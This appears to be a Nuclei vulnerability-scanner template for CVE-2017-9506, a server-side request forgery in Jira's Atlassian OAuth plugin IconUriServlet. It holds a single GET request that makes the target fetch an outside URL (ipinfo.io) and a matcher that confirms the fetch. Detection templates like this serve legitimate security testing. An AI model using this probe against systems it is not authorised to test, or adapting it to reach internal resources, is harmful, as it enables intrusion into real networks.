nuclei-templates/cves/2017/CVE-2017-9506.yaml

18 lines
621 B
YAML

id: CVE-2017-9506
info:
name: Jira IconURIServlet SSRF
author: Ice3man
severity: high
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
matchers:
- type: word
words:
- "ipinfo.io/missingauth"
part: body